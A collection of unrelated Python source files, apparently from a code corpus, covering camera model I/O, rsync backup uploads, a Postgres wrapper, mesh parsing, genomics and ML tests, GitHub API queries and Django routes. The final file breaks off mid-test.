import re
from configparser import ConfigParser
from tadataka.camera.model import CameraModel
def parse_(line):
camera_id, model_params = re.split(r"\s+", line, maxsplit=1)
try:
camera_id = int(camera_id)
except ValueError:
raise ValueError("Camera ID must be integer")
return camera_id, CameraModel.fromstring(model_params)
def load(filename):
camera_models = dict()
with open(filename, 'r') as f:
for line in f:
camera_id, camera_model = parse_(line.strip())
camera_models[camera_id] = camera_model
return camera_models
def save(filename, camera_models):
# sort by camera_id to make it easy to test
items = sorted(camera_models.items(), key=lambda v: v[0])
with open(filename, 'w') as f:
for camera_id, camera_model in items:
line = ' '.join([str(camera_id), str(camera_model)])
f.write(line + '\n')
|
60725
|
import os
import shutil
def ensure_folder_exists_and_is_clear(folder):
if not os.path.exists(folder):
os.makedirs(folder)
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
raise
|
60777
|
import os
import logging
import re
from copy_reg import pickle
from multiprocessing import Pool
from subprocess import check_output
from types import MethodType
from RsyncUploadThread import RsyncUploadThread
from mongodb_consistent_backup.Common import config_to_string
from mongodb_consistent_backup.Errors import OperationError
from mongodb_consistent_backup.Pipeline import Task
# Allows pooled .apply_async()s to work on Class-methods:
def _reduce_method(m):
if m.im_self is None:
return getattr, (m.im_class, m.im_func.func_name)
else:
return getattr, (m.im_self, m.im_func.func_name)
pickle(MethodType, _reduce_method)
class Rsync(Task):
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
self.backup_location = self.config.backup.location
self.backup_name = self.config.backup.name
self.remove_uploaded = self.config.upload.remove_uploaded
self.retries = self.config.upload.retries
self.rsync_path = self.config.upload.rsync.path
self.rsync_user = self.config.upload.rsync.user
self.rsync_host = self.config.upload.rsync.host
self.rsync_port = self.config.upload.rsync.port
self.rsync_ssh_key = self.config.upload.rsync.ssh_key
self.rsync_binary = "rsync"
self.rsync_flags = ["--archive", "--compress"]
self.rsync_version = None
self._rsync_info = None
self.threads(self.config.upload.threads)
self._pool = Pool(processes=self.threads())
def init(self):
if not self.host_has_rsync():
raise OperationError("Cannot find rsync binary on this host!")
if not os.path.isdir(self.backup_dir):
logging.error("The source directory: %s does not exist or is not a directory! Skipping Rsync upload!" % self.backup_dir)
raise OperationError("The source directory: %s does not exist or is not a directory! Skipping Rsync upload!" % self.backup_dir)
def rsync_info(self):
if not self._rsync_info:
output = check_output([self.rsync_binary, "--version"])
search = re.search(r"^rsync\s+version\s([0-9.-]+)\s+protocol\sversion\s(\d+)", output)
self.rsync_version = search.group(1)
self._rsync_info = {"version": self.rsync_version, "protocol_version": int(search.group(2))}
return self._rsync_info
def host_has_rsync(self):
if self.rsync_info():
return True
return False
def get_dest_path(self):
return os.path.join(self.rsync_path, self.base_dir)
def prepare_dest_dir(self):
# mkdir -p the rsync dest path via ssh
ssh_mkdir_cmd = ["ssh"]
if self.rsync_ssh_key:
ssh_mkdir_cmd.extend(["-i", self.rsync_ssh_key])
ssh_mkdir_cmd.extend([
"%s@%s" % (self.rsync_user, self.rsync_host),
"mkdir", "-p", self.get_dest_path()
])
# run the mkdir via ssh
try:
check_output(ssh_mkdir_cmd)
except Exception, e:
logging.error("Creating rsync dest path with ssh failed for %s: %s" % (
self.rsync_host,
e
))
raise e
return True
def done(self, data):
logging.info(data)
def run(self):
try:
self.init()
self.timer.start(self.timer_name)
logging.info("Preparing destination path on %s" % self.rsync_host)
self.prepare_dest_dir()
rsync_config = {
"dest": "%s@%s:%s" % (self.rsync_user, self.rsync_host, self.get_dest_path()),
"threads": self.threads(),
"retries": self.retries
}
rsync_config.update(self.rsync_info())
logging.info("Starting upload using rsync version %s (%s)" % (
self.rsync_info()['version'],
config_to_string(rsync_config)
))
for child in os.listdir(self.backup_dir):
self._pool.apply_async(RsyncUploadThread(
os.path.join(self.backup_dir, child),
self.base_dir,
self.rsync_flags,
self.rsync_path,
self.rsync_user,
self.rsync_host,
self.rsync_port,
self.rsync_ssh_key,
self.remove_uploaded,
self.retries
).run, callback=self.done)
self.wait()
except Exception, e:
logging.error("Rsync upload failed! Error: %s" % e)
raise OperationError(e)
finally:
self.timer.stop(self.timer_name)
self.completed = True
def wait(self):
if self._pool:
logging.info("Waiting for Rsync upload threads to stop")
self._pool.close()
self._pool.join()
def close(self):
if self._pool:
logging.error("Stopping Rsync upload threads")
self._pool.terminate()
self._pool.join()
|
60782
|
import time
import os
import psycopg2
import psycopg2.extras
from pyinfraboxutils import get_logger
logger = get_logger('infrabox')
def connect_db():
while True:
try:
conn = psycopg2.connect(dbname=os.environ['INFRABOX_DATABASE_DB'],
user=os.environ['INFRABOX_DATABASE_USER'],
password=os.environ['<PASSWORD>'],
host=os.environ['INFRABOX_DATABASE_HOST'],
port=os.environ['INFRABOX_DATABASE_PORT'])
return conn
except Exception as e:
logger.warn("Could not connect to db: %s", e)
time.sleep(3)
class DB(object):
def __init__(self, conn):
self.conn = conn
def execute_one(self, stmt, args=None):
r = self.execute_many(stmt, args)
if not r:
return r
return r[0]
def execute_many(self, stmt, args=None):
c = self.conn.cursor(cursor_factory=psycopg2.extras.DictCursor)
c.execute(stmt, args)
r = c.fetchall()
c.close()
return r
def execute_one_dict(self, stmt, args=None):
r = self.execute_many_dict(stmt, args)
if not r:
return r
return r[0]
def execute_many_dict(self, stmt, args=None):
c = self.conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
c.execute(stmt, args)
r = c.fetchall()
c.close()
return r
def execute(self, stmt, args=None):
c = self.conn.cursor()
c.execute(stmt, args)
c.close()
def commit(self):
self.conn.commit()
def rollback(self):
self.conn.rollback()
def close(self):
self.conn.close()
|
60794
|
import os
import numpy as np
from pwtools.common import is_seq, file_write
from .testenv import testdir
def test_is_seq():
fn = os.path.join(testdir, 'is_seq_test_file')
file_write(fn, 'lala')
fd = open(fn , 'r')
for xx in ([1,2,3], (1,2,3), np.array([1,2,3])):
print(type(xx))
assert is_seq(xx) is True
for xx in ('aaa', fd):
print(type(xx))
assert is_seq(xx) is False
fd.close()
|
60837
|
from __future__ import absolute_import
from . import pubnub # noqa
from . import requests # noqa
|
60866
|
import enum
from rose.utils import *
class VertexFormat(enum.IntEnum):
POSITION = 1 << 1
NORMAL = 1 << 2
COLOR = 1 << 3
BONEWEIGHT = 1 << 4
BONEINDEX = 1 << 5
TANGENT = 1 << 6
UV1 = 1 << 7
UV2 = 1 << 8
UV3 = 1 << 9
UV4 = 1 << 10
class Vertex:
def __init__(self):
self.position = Vector3()
self.normal = Vector3()
self.color = Color4()
self.bone_weights = Vector4()
self.bone_indices = Vector4()
self.tangent = Vector3()
self.uv1 = Vector2()
self.uv2 = Vector2()
self.uv3 = Vector2()
self.uv4 = Vector2()
class ZMS:
def __init__(self):
self.identifier = ""
self.format = -1
self.bounding_box = BoundingBox()
self.bones = []
self.vertices = []
self.indices = []
self.materials = []
self.strips = []
self.pool = 0
def positions_enabled(self):
return (VertexFormat.POSITION & self.format) != 0
def normals_enabled(self):
return (VertexFormat.NORMAL & self.format) != 0
def colors_enabled(self):
return (VertexFormat.COLOR & self.format) != 0
def bones_enabled(self):
return ((VertexFormat.BONEWEIGHT & self.format) != 0) and (
(VertexFormat.BONEINDEX & self.format) != 0
)
def tangents_enabled(self):
return (VertexFormat.TANGENT & self.format) != 0
def uv1_enabled(self):
return (VertexFormat.UV1 & self.format) != 0
def uv2_enabled(self):
return (VertexFormat.UV2 & self.format) != 0
def uv3_enabled(self):
return (VertexFormat.UV3 & self.format) != 0
def uv4_enabled(self):
return (VertexFormat.UV4 & self.format) != 0
def load(self, filepath):
with open(filepath, "rb") as f:
self.identifier = read_str(f)
version = None
if self.identifier == "ZMS0007":
version = 7
elif self.identifier == "ZMS0008":
version = 8
if not version:
raise RoseParseError(f"Unrecognized zms identifier {self.identifier}")
self.format = read_i32(f)
self.bounding_box.min = read_vector3_f32(f)
self.bounding_box.max = read_vector3_f32(f)
bone_count = read_i16(f)
for _ in range(bone_count):
self.bones.append(read_i16(f))
vert_count = read_i16(f)
for _ in range(vert_count):
self.vertices.append(Vertex())
if self.positions_enabled():
for i in range(vert_count):
self.vertices[i].position = read_vector3_f32(f)
if self.normals_enabled():
for i in range(vert_count):
self.vertices[i].normal = read_vector3_f32(f)
if self.colors_enabled():
for i in range(vert_count):
self.vertices[i].color = read_color4(f)
if self.bones_enabled():
for i in range(vert_count):
self.vertices[i].bone_weights = read_vector4_f32(f)
self.vertices[i].bone_indices = read_vector4_i16(f)
if self.tangents_enabled():
for i in range(vert_count):
self.vertices[i].tangent = read_vector3_f32(f)
if self.uv1_enabled():
for i in range(vert_count):
self.vertices[i].uv1 = read_vector2_f32(f)
if self.uv2_enabled():
for i in range(vert_count):
self.vertices[i].uv2 = read_vector2_f32(f)
if self.uv3_enabled():
for i in range(vert_count):
self.vertices[i].uv3 = read_vector2_f32(f)
if self.uv4_enabled():
for i in range(vert_count):
self.vertices[i].uv4 = read_vector2_f32(f)
index_count = read_i16(f)
for _ in range(index_count):
self.indices.append(read_vector3_i16(f))
material_count = read_i16(f)
for _ in range(material_count):
self.materials.append(read_i16(f))
strip_count = read_i16(f)
for _ in range(strip_count):
self.strips.append(read_i16(f))
if version >= 8:
self.pool = read_i16(f)
|
60913
|
import unittest
import hail as hl
from lib.model.seqr_mt_schema import SeqrVariantSchema
from tests.data.sample_vep import VEP_DATA, DERIVED_DATA
class TestSeqrModel(unittest.TestCase):
def _get_filtered_mt(self, rsid='rs35471880'):
mt = hl.import_vcf('tests/data/1kg_30variants.vcf.bgz')
mt = hl.split_multi(mt.filter_rows(mt.rsid == rsid))
return mt
def test_variant_derived_fields(self):
rsid = 'rs35471880'
mt = self._get_filtered_mt(rsid).annotate_rows(**VEP_DATA[rsid])
seqr_schema = SeqrVariantSchema(mt)
seqr_schema.sorted_transcript_consequences().doc_id(length=512).variant_id().contig().pos().start().end().ref().alt() \
.pos().xstart().xstop().xpos().transcript_consequence_terms().transcript_ids().main_transcript().gene_ids() \
.coding_gene_ids().domains().ac().af().an().annotate_all()
mt = seqr_schema.select_annotated_mt()
obj = mt.rows().collect()[0]
# Cannot do a nested compare because of nested hail objects, so do one by one.
fields = ['AC', 'AF', 'AN', 'codingGeneIds', 'docId', 'domains', 'end', 'geneIds', 'ref', 'alt', 'start',
'variantId', 'transcriptIds', 'xpos', 'xstart', 'xstop', 'contig']
for field in fields:
self.assertEqual(obj[field], DERIVED_DATA[rsid][field])
self.assertEqual(obj['mainTranscript']['transcript_id'], DERIVED_DATA[rsid]['mainTranscript']['transcript_id'])
def test_variant_genotypes(self):
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.genotypes().select_annotated_mt()
genotypes = mt.rows().collect()[0].genotypes
actual = {gen['sample_id']: dict(gen) for gen in genotypes}
expected = {'HG00731': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 73.0, 'sample_id': 'HG00731'},
'HG00732': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 70.0, 'sample_id': 'HG00732'},
'HG00733': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 66.0, 'sample_id': 'HG00733'},
'NA19675': {'num_alt': 1, 'gq': 99, 'ab': 0.6000000238418579, 'dp': 29.0,
'sample_id': 'NA19675'},
'NA19678': {'num_alt': 0, 'gq': 78, 'ab': 0.0, 'dp': 28.0, 'sample_id': 'NA19678'},
'NA19679': {'num_alt': 1, 'gq': 99, 'ab': 0.3571428656578064, 'dp': 27.0,
'sample_id': 'NA19679'},
'NA20870': {'num_alt': 1, 'gq': 99, 'ab': 0.5142857432365417, 'dp': 67.0,
'sample_id': 'NA20870'},
'NA20872': {'num_alt': 1, 'gq': 99, 'ab': 0.5066666603088379, 'dp': 74.0,
'sample_id': 'NA20872'},
'NA20874': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 69.0, 'sample_id': 'NA20874'},
'NA20875': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 93.0, 'sample_id': 'NA20875'},
'NA20876': {'num_alt': 1, 'gq': 99, 'ab': 0.4383561611175537, 'dp': 70.0,
'sample_id': 'NA20876'},
'NA20877': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 76.0, 'sample_id': 'NA20877'},
'NA20878': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 73.0, 'sample_id': 'NA20878'},
'NA20881': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 69.0, 'sample_id': 'NA20881'},
'NA20885': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 82.0, 'sample_id': 'NA20885'},
'NA20888': {'num_alt': 0, 'gq': 99, 'ab': 0.0, 'dp': 74.0, 'sample_id': 'NA20888'}}
self.assertEqual(actual, expected)
def test_samples_num_alt(self):
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_no_call().samples_num_alt().select_annotated_mt()
row = mt.rows().flatten().collect()[0]
self.assertEqual(row.samples_no_call, set())
self.assertEqual(row['samples_num_alt.1'], {'NA19679', 'NA19675', 'NA20870', 'NA20876', 'NA20872'})
self.assertEqual(row['samples_num_alt.2'], set())
def test_samples_gq(self):
non_empty = {
'samples_gq.75_to_80': {'NA19678'}
}
start = 0
end = 95
step = 5
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_gq(start, end, step).select_annotated_mt()
row = mt.rows().flatten().collect()[0]
for name, samples in non_empty.items():
self.assertEqual(row[name], samples)
for i in range(start, end, step):
name = 'samples_gq.%i_to_%i' % (i, i+step)
if name not in non_empty:
self.assertEqual(row[name], set())
def test_samples_ab(self):
non_empty = {
'samples_ab.35_to_40': {'NA19679'},
'samples_ab.40_to_45': {'NA20876'},
}
start = 0
end = 45
step = 5
mt = self._get_filtered_mt()
seqr_schema = SeqrVariantSchema(mt)
mt = seqr_schema.samples_ab(start, end, step).select_annotated_mt()
row = mt.rows().flatten().collect()[0]
for name, samples in non_empty.items():
self.assertEqual(row[name], samples)
for i in range(start, end, step):
name = 'samples_ab.%i_to_%i' % (i, i+step)
if name not in non_empty:
self.assertEqual(row[name], set())
|
60921
|
from yaml import safe_load
from hashlib import md5
from enum import Enum
from box import Box
class YamlType(Enum):
BASE = 0
PIPELINE = 1
SERVICE = 2
def Yaml(path):
"""
Sudo class for managing a yaml as a python object.
:param path: path to .yaml file
"""
__type__ = None
__text__ = open(path).read()
yaml = safe_load(__text__)
for yaml_type in YamlType:
if yaml_type.name.lower() in yaml:
__type__ = yaml_type
if __type__ is None:
raise ValueError('Invalid yaml type for %s' % path)
box = Box(yaml[__type__.name.lower()])
box.__path__ = path
box.__text__ = __text__
box.__type__ = __type__
box.hash = md5(__text__.encode()).hexdigest()
return box
|
60924
|
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import re
from scipy import linalg
import scipy.ndimage as ndi
from six.moves import range
import os
import sys
import threading
import copy
import inspect
import types
from keras import backend as K
from keras.utils.generic_utils import Progbar
import tensorflow as tf
import cv2
class ImageDataGenerator(object):
'''Generate minibatches with
real-time data augmentation.
# Arguments
featurewise_center: set input mean to 0 over the dataset.
samplewise_center: set each sample mean to 0.
featurewise_std_normalization: divide inputs by std of the dataset.
samplewise_std_normalization: divide each input by its std.
featurewise_standardize_axis: axis along which to perform feature-wise center and std normalization.
samplewise_standardize_axis: axis along which to to perform sample-wise center and std normalization.
zca_whitening: apply ZCA whitening.
rotation_range: degrees (0 to 180).
width_shift_range: fraction of total width.
height_shift_range: fraction of total height.
shear_range: shear intensity (shear angle in radians).
zoom_range: amount of zoom. if scalar z, zoom will be randomly picked
in the range [1-z, 1+z]. A sequence of two can be passed instead
to select this range.
channel_shift_range: shift range for each channels.
fill_mode: points outside the boundaries are filled according to the
given mode ('constant', 'nearest', 'reflect' or 'wrap'). Default
is 'nearest'.
cval: value used for points outside the boundaries when fill_mode is
'constant'. Default is 0.
horizontal_flip: whether to randomly flip images horizontally.
vertical_flip: whether to randomly flip images vertically.
rescale: rescaling factor. If None or 0, no rescaling is applied,
otherwise we multiply the data by the value provided (before applying
any other transformation).
dim_ordering: 'th' or 'tf'. In 'th' mode, the channels dimension
(the depth) is at index 1, in 'tf' mode it is at index 3.
It defaults to the `image_dim_ordering` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "th".
seed: random seed for reproducible pipeline processing. If not None, it will also be used by `flow` or
`flow_from_directory` to generate the shuffle index in case of no seed is set.
'''
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
featurewise_standardize_axis=None,
samplewise_standardize_axis=None,
zca_whitening=False,
rotation_range=0.,
width_shift_range=0.,
height_shift_range=0.,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
dim_ordering=K.image_dim_ordering(),
seed=None,
verbose=1):
self.config = copy.deepcopy(locals())
self.config['config'] = self.config
self.config['mean'] = None
self.config['std'] = None
self.config['principal_components'] = None
self.config['rescale'] = rescale
if dim_ordering not in {'tf', 'th'}:
raise Exception('dim_ordering should be "tf" (channel after row and '
'column) or "th" (channel before row and column). '
'Received arg: ', dim_ordering)
self.__sync_seed = self.config['seed'] or np.random.randint(0, 4294967295)
self.default_pipeline = []
self.default_pipeline.append(random_transform)
self.default_pipeline.append(standardize)
self.set_pipeline(self.default_pipeline)
self.__fitting = False
self.fit_lock = threading.Lock()
@property
def sync_seed(self):
return self.__sync_seed
@property
def fitting(self):
return self.__fitting
@property
def pipeline(self):
return self.__pipeline
def sync(self, image_data_generator):
self.__sync_seed = image_data_generator.sync_seed
return (self, image_data_generator)
def set_pipeline(self, p):
if p is None:
self.__pipeline = self.default_pipeline
elif type(p) is list:
self.__pipeline = p
else:
raise Exception('invalid pipeline.')
def flow(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
return NumpyArrayIterator(
X, y, self,
batch_size=batch_size, shuffle=shuffle, seed=seed,
dim_ordering=self.config['dim_ordering'],
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
def flow_from_list(self, X, y=None, batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
return ListArrayIterator(
X, y, self,
batch_size=batch_size, shuffle=shuffle, seed=seed,
dim_ordering=self.config['dim_ordering'],
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
# def flow_with_mask(self, X, y=None, batch_size=32, shuffle=True, seed=None,
# save_to_dir=None, save_prefix='', save_mode=None, save_format='jpeg'):
# return ListArrayIteratorWithMask(
# X, y, self,
# batch_size=batch_size, shuffle=shuffle, seed=seed,
# dim_ordering=self.config['dim_ordering'],
# save_to_dir=save_to_dir, save_prefix=save_prefix,
# save_mode=save_mode, save_format=save_format)
def flow_from_directory(self, directory,
color_mode=None, target_size=None,
image_reader='pil', reader_config=None,
read_formats=None,
classes=None, class_mode='categorical',
batch_size=32, shuffle=True, seed=None,
save_to_dir=None, save_prefix='',
save_mode=None, save_format='jpeg'):
if reader_config is None:
reader_config = {'target_mode': 'RGB', 'target_size': (256, 256)}
if read_formats is None:
read_formats = {'png', 'jpg', 'jpeg', 'bmp'}
return DirectoryIterator(
directory, self,
color_mode=color_mode, target_size=target_size,
image_reader=image_reader, reader_config=reader_config,
read_formats=read_formats,
classes=classes, class_mode=class_mode,
dim_ordering=self.config['dim_ordering'],
batch_size=batch_size, shuffle=shuffle, seed=seed,
save_to_dir=save_to_dir, save_prefix=save_prefix,
save_mode=save_mode, save_format=save_format)
def process(self, x):
# get next sync_seed
np.random.seed(self.__sync_seed)
self.__sync_seed = np.random.randint(0, 4294967295)
self.config['fitting'] = self.__fitting
self.config['sync_seed'] = self.__sync_seed
for p in self.__pipeline:
x = p(x, **self.config)
return x
def fit_generator(self, generator, nb_iter):
'''Fit a generator
# Arguments
generator: Iterator, generate data for fitting.
nb_iter: Int, number of iteration to fit.
'''
with self.fit_lock:
try:
self.__fitting = nb_iter*generator.batch_size
for i in range(nb_iter):
next(generator)
finally:
self.__fitting = False
def fit(self, X, rounds=1):
'''Fit the pipeline on a numpy array
# Arguments
X: Numpy array, the data to fit on.
rounds: how many rounds of fit to do over the data
'''
# X = np.copy(X)
with self.fit_lock:
try:
# self.__fitting = rounds*X.shape[0]
self.__fitting = rounds * len(X)
for r in range(rounds):
# for i in range(X.shape[0]):
for i in range(len(X)):
self.process(X[i])
finally:
self.__fitting = False
if __name__ == '__main__':
pass
|
60954
|
from string import Template
from requests import get, post
userInfoQuery = """
{
viewer {
login
id
}
}
"""
createContributedRepoQuery = Template("""
query {
user(login: "$username") {
repositoriesContributedTo(last: 100, includeUserRepositories: true) {
nodes {
isFork
name
owner {
login
}
}
}
}
}
""")
createCommittedDateQuery = Template("""
query {
repository(owner: "$owner", name: "$name") {
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 100, author: { id: "$id" }) {
edges {
node {
committedDate
}
}
}
}
}
}
}
}
""")
repositoryListQuery = Template("""
{
user(login: "$username") {
repositories(orderBy: {field: CREATED_AT, direction: ASC}, last: 100, affiliations: [OWNER, COLLABORATOR, ORGANIZATION_MEMBER], isFork: false) {
totalCount
edges {
node {
object(expression:"master") {
... on Commit {
history (author: { id: "$id" }){
totalCount
}
}
}
primaryLanguage {
color
name
id
}
stargazers {
totalCount
}
collaborators {
totalCount
}
createdAt
name
owner {
id
login
}
nameWithOwner
}
}
}
location
createdAt
name
}
}
""")
getLinesOfCodeQuery = Template("""/repos/$owner/$repo/stats/code_frequency""")
getProfileViewQuery = Template(
"""/repos/$owner/$repo/traffic/views""")
getProfileTrafficQuery = Template(
"""/repos/$owner/$repo/traffic/popular/referrers""")
class RunQuery():
def __init__(self, headers):
self.headers = headers
def runGithubAPIQuery(self, query):
request = get("https://api.github.com" + query, headers=self.headers)
if request.status_code == 200:
return request.json()
else:
raise Exception(
"Query failed to run by returning code of {}. {},... {}".format(
request.status_code, query, str(request.json())))
def runGithubGraphqlQuery(self, query) -> dict:
request = post("https://api.github.com/graphql",
json={"query": query}, headers=self.headers)
if request.status_code == 200:
return request.json()
else:
raise Exception("Query failed to run by returning code of {}. {}".format(
request.status_code, query))
def runGithubContributionsQuery(self, username):
request = get(
"https://github-contributions.now.sh/api/v1/" + username)
if request.status_code == 200:
return request.json()
|
60969
|
import os
import setuptools
from pathlib import Path
directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'peg_in_hole', 'envs', 'assets')
data_files = []
for root, dirs, files in os.walk(directory):
for file in files:
data_files.append(os.path.join(root, file))
setuptools.setup(
name='peg-in-hole-gym',
version='0.1.0',
description='An gym env for simulating flexible tube grasp.',
long_description=Path('README.md').read_text(),
long_description_content_type='text/markdown',
packages=setuptools.find_packages(include='envs'),
packages_data={'model_files': data_files},
install_requires=['gym', 'pybullet', 'numpy'],
url='https://github.com/guodashun/peg-in-hole-gym',
author='luckky',
author_email='<EMAIL>',
license='MIT',
)
|
60984
|
import pytest
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from ..sequential import sequential
import pkg_resources
PATH = pkg_resources.resource_filename(__name__, 'test_data/')
def test_sequential():
"Test sequential feature selection"
# load data
X = np.load(PATH+'features_largeN.npy')
X = X[:,:20]
y = np.load(PATH+'features_largeN_labels.npy')
# perform SFS
clf = RandomForestClassifier(n_estimators=100)
X_fwd = sequential(X, y, estimator=clf)
X_bwd = sequential(X, y, estimator=clf, direction='backward')
# test shapes
X_fwd.shape == (700, 10)
X_bwd.shape == (700, 10)
|
60991
|
from django.urls import path
from .views import (
change_password,
login,
logout,
profile,
register,
register_email,
reset_password,
send_reset_password_link,
verify_email,
verify_registration
)
app_name = 'rest_registration'
urlpatterns = [
path('register/', register, name='register'),
path('verify-registration/', verify_registration, name='verify-registration'),
path(
'send-reset-password-link/', send_reset_password_link,
name='send-reset-password-link',
),
path('reset-password/', reset_password, name='reset-password'),
path('login/', login, name='login'),
path('logout/', logout, name='logout'),
path('profile/', profile, name='profile'),
path('change-password/', change_password, name='change-password'),
path('register-email/', register_email, name='register-email'),
path('verify-email/', verify_email, name='verify-email'),
]
|
60998
|
from pymesh.TestCase import TestCase
from pymesh import distance_to_mesh, BVH
from pymesh.meshutils import generate_box_mesh
import numpy as np
class DistanceToMeshTest(TestCase):
def test_boundary_pts_cgal(self):
mesh = generate_box_mesh(
np.array([0, 0, 0]), np.array([1, 1, 1]))
pts = np.array([
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.0] ])
sq_dist, face_idx, closest_pts = distance_to_mesh(mesh, pts, "cgal")
self.assert_array_equal(sq_dist, np.zeros(2))
def test_boundary_pts_geogram(self):
mesh = generate_box_mesh(
np.array([0, 0, 0]), np.array([1, 1, 1]))
pts = np.array([
[0.0, 0.0, 0.0],
[1.0, 1.0, 1.0] ])
if "geogram" in BVH.available_engines:
sq_dist, face_idx, closest_pts = distance_to_mesh(mesh, pts, "geogram")
self.assert_array_equal(sq_dist, np.zeros(2))
|
61004
|
import torch
import torch.nn as nn
import numpy as np
class IndexTranslator(object):
def __init__(self, state):
self.state = state
self.px = self.state[:, 0].reshape(-1, 1)
self.py = self.state[:, 1].reshape(-1, 1)
self.vx = self.state[:, 2].reshape(-1, 1)
self.vy = self.state[:, 3].reshape(-1, 1)
self.radius = self.state[:, 4].reshape(-1, 1)
self.pgx = self.state[:, 5].reshape(-1, 1)
self.pgy = self.state[:, 6].reshape(-1, 1)
self.v_pref = self.state[:, 7].reshape(-1, 1)
self.theta = self.state[:, 8].reshape(-1, 1)
self.px1 = self.state[:, 9].reshape(-1, 1)
self.py1 = self.state[:, 10].reshape(-1, 1)
self.vx1 = self.state[:, 11].reshape(-1, 1)
self.vy1 = self.state[:, 12].reshape(-1, 1)
self.radius1 = self.state[:, 13].reshape(-1, 1)
class ValueNetwork(nn.Module):
def __init__(self, state_dim, fc_layers, kinematic, reparametrization=True):
super(ValueNetwork, self).__init__()
self.reparametrization = reparametrization
if reparametrization:
state_dim = 15
self.kinematic = kinematic
self.value_network = nn.Sequential(nn.Linear(state_dim, fc_layers[0]), nn.ReLU(),
nn.Linear(fc_layers[0], fc_layers[1]), nn.ReLU(),
nn.Linear(fc_layers[1], fc_layers[2]), nn.ReLU(),
nn.Linear(fc_layers[2], 1))
def rotate(self, state, device):
# first translate the coordinate then rotate around the origin
# 'px', 'py', 'vx', 'vy', 'radius', 'pgx', 'pgy', 'v_pref', 'theta', 'px1', 'py1', 'vx1', 'vy1', 'radius1'
# 0 1 2 3 4 5 6 7 8 9 10 11 12 13
state = IndexTranslator(state.cpu().numpy())
dx = state.pgx - state.px
dy = state.pgy - state.py
rot = np.arctan2(state.pgy-state.py, state.pgx-state.px)
dg = np.linalg.norm(np.concatenate([dx, dy], axis=1), axis=1, keepdims=True)
v_pref = state.v_pref
vx = state.vx * np.cos(rot) + state.vy * np.sin(rot)
vy = state.vy * np.cos(rot) - state.vx * np.sin(rot)
radius = state.radius
if self.kinematic:
theta = state.theta - rot
else:
theta = state.theta
vx1 = state.vx1 * np.cos(rot) + state.vy1 * np.sin(rot)
vy1 = state.vy1 * np.cos(rot) - state.vx1 * np.sin(rot)
px1 = (state.px1 - state.px) * np.cos(rot) + (state.py1 - state.py) * np.sin(rot)
py1 = (state.py1 - state.py) * np.cos(rot) - (state.px1 - state.px) * np.sin(rot)
radius1 = state.radius1
radius_sum = radius + radius1
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
da = np.linalg.norm(np.concatenate([state.px - state.px1, state.py - state.py1], axis=1), axis=1, keepdims=True)
new_state = np.concatenate([dg, v_pref, vx, vy, radius, theta, vx1, vy1, px1, py1,
radius1, radius_sum, cos_theta, sin_theta, da], axis=1)
return torch.Tensor(new_state).to(device)
def forward(self, state, device):
if self.reparametrization:
state = self.rotate(state, device)
temp_value_network = self.value_network;
value = temp_value_network(state)
return value
|
61073
|
import os
import KratosMultiphysics
from KratosMultiphysics import Logger
Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.DEMApplication.DEM_analysis_stage
import numpy as np
import auxiliary_functions_for_tests
this_working_dir_backup = os.getcwd()
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
class DEM3D_SearchToleranceMain(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage, KratosUnittest.TestCase):
def Initialize(self):
super().Initialize()
for node in self.spheres_model_part.Nodes:
self.initial_normal_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z)
@classmethod
def GetMainPath(self):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_search_tolerance")
def GetProblemNameWithPath(self):
return os.path.join(self.main_path, self.DEM_parameters["problem_name"].GetString())
def FinalizeSolutionStep(self):
super().FinalizeSolutionStep()
for node in self.spheres_model_part.Nodes:
#reference data with freq=1 searchtolerance=0.0
if node.Id == 2:
tol = 1.0e-15
if np.isclose(self.time, 0.02, rtol=0.0, atol=1e-06):
y_vel = node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)
print(self.time, y_vel)
y_vel_ref = -5.86502139707038
self.assertAlmostEqual(y_vel, y_vel_ref, delta=tol)
if np.isclose(self.time, 0.115, rtol=0.0, atol=1e-06):
